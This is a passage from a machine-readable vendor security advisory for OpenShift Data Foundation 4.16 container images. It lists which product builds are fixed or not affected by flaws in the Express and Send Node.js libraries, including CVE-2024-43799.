"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "express: Improper Input Handling in Express Redirects", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], known_not_affected: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", 